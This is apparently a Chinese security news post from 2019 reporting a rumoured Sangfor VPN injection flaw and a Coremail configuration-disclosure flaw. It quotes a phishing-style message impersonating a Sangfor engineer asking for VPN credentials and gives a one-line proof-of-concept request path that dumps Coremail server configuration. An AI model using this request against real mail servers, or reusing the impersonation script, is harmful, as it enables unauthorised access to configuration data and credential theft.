深信服VPN某接口有注入漏洞,Coremail接口存配置读取漏洞POC

By admin

2019-06-14 18:23:44

浏览量480

已赞0

今日传的最多的,应该就是深信服VPN某接口存在漏洞这一事了。
深信服VPN某接口有注入漏洞,Coremail接口存配置读取漏洞POC

在网友询问客服后,得到了一下信息

深信服VPN某接口有注入漏洞,Coremail接口存配置读取漏洞POC

而由于现时期较敏感,众人神经紧绷,在传出深信服后被爆VPN漏洞后,开始传出了以下信息。

深信服VPN某接口有注入漏洞,Coremail接口存配置读取漏洞POC

您好,我是深信服的售后工程师,我的工号是:9527,由于我们的VPN存在缺陷,现对贵司VPN进行远程协助升级,请尽快提供VPN地址账号和密码,以免被HW黑客攻破,谢谢

除此之外,今早还网传Coremail mailsms接口配置存在读取漏洞

Coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。
截止2019年,Coremail邮件系统产品在国内已拥有10亿终端用户  ,是目前国内拥有邮箱使用用户最多的邮件系统。Coremail今天不但为网易(126、163、yeah)、移动,联通等知名运营商提供电子邮件整体技术解决方案及企业邮局运营服务,还为石油、钢铁、电力、政府、金融、教育、尖端制造企业等用户提供邮件系统软件和反垃圾服务。

旧版本经过测试,确实存在漏洞

Coremail地址 + 

/mailsms/s?func=ADMIN:appState&dumpConfig=/

看返回结果,你就知道一切了。

发表评论
拖动滑块验证
»
请先 注册/登录 后参与评论

已有0 发布

默认   热门   正序   倒序
    查看更多评论
    已有0次打赏